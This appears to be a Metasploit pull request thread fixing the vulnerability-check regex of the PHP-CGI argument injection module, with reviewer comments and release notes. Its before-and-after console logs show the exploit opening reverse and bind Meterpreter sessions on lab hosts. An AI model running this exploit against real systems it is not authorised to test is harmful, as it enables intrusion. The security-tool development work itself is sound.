php_cgi_arg_injection: Fix check regex match to detect code html tag

[bcoles]

Fixes #17822 by replacing:

response.body =~ /\<code\>\<span style.*\&lt\;\?/mi

With:

response.body.to_s.lstrip =~ /^<code><span style/i

It seems likely that the entire response body would start with the <code> block due to invoking the PHP pre-processor before returning content. However, without access to a bunch of test boxes (and without bothering to dig through 10 year old PHP source), simple checking for the <code> block at start-of-line (instead of start-of-document) seems like a quick and easy approach. lstrip is unlikely to be necessary, but makes the check even more reliable just in case.

Performing case-insensitive matching also seems unnecessary, but that's what the original module used.

---

Before

msf6 exploit(multi/http/php_cgi_arg_injection) > check
[*] 192.168.200.142:80 - The target is not exploitable.
msf6 exploit(multi/http/php_cgi_arg_injection) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] Sending stage (39927 bytes) to 192.168.200.142
[*] Meterpreter session 10 opened (192.168.200.130:4444 -> 192.168.200.142:50946) at 2023-03-27 00:30:21 -0400

meterpreter > getuid
Server username: www-data
meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.200.142 - Meterpreter session 10 closed.  Reason: User exit
msf6 exploit(multi/http/php_cgi_arg_injection) >

After

msf6 exploit(multi/http/php_cgi_arg_injection) > check
[+] 192.168.200.142:80 - The target is vulnerable.
msf6 exploit(multi/http/php_cgi_arg_injection) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] Sending stage (39927 bytes) to 192.168.200.142
[*] Meterpreter session 9 opened (192.168.200.130:4444 -> 192.168.200.142:50945) at 2023-03-27 00:30:08 -0400

meterpreter > getuid
Server username: www-data
meterpreter > [*] Shutting down Meterpreter...

[*] 192.168.200.142 - Meterpreter session 9 closed.  Reason: Died

[cdelafuente-r7]

Would it make sense to use xpath with response.get_html_document.xpath(...) instead?

[bcoles]

For what reason? Would xpath detect code at the start of line?

[cdelafuente-r7]

No specific reason, xpath is usually preferred when HTML parsing is required. It was just a suggestion, I'm fine with regex too.

[cdelafuente-r7]

Thanks @bcoles for fixing this. It looks good to me. I tested against Metasploitable 2 and verified this fixed the issue. I'll go ahead and land it.

Before

msf6 exploit(multi/http/php_cgi_arg_injection) > check verbose=true rhosts=10.77.12.39 targeturi=/

[*] Checking uri /
[-] Server responded indicating it was not vulnerable
[*] 10.77.12.39:80 - The target is not exploitable.
msf6 exploit(multi/http/php_cgi_arg_injection) > run verbose=true rhosts=10.77.12.39 targeturi=/

[*] Started bind TCP handler against 10.77.12.39:4444
[*] Sending stage (39927 bytes) to 10.77.12.39
[*] Meterpreter session 1 opened (10.1.100.33:57072 -> 10.77.12.39:4444) at 2023-04-05 16:40:18 +0200

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : metasploitable-201-3-1
OS          : Linux metasploitable-201-3-1 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux

After

msf6 exploit(multi/http/php_cgi_arg_injection) > check verbose=true rhosts=10.77.12.39 targeturi=/

[*] Checking uri /
[+] 10.77.12.39:80 - The target is vulnerable.
msf6 exploit(multi/http/php_cgi_arg_injection) > run verbose=true rhosts=10.77.12.39 targeturi=/

[*] Started bind TCP handler against 10.77.12.39:4444
[*] Sending stage (39927 bytes) to 10.77.12.39
[*] Meterpreter session 1 opened (10.1.100.33:57031 -> 10.77.12.39:4444) at 2023-04-05 16:36:10 +0200

meterpreter > getuid
Server username: www-data
smeterpreter > sysinfo
Computer    : metasploitable-201-3-1
OS          : Linux metasploitable-201-3-1 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux

[cdelafuente-r7]

Release Notes

This fixes an issue in the check method where targets with files containing no PHP code were falsely reported as safe.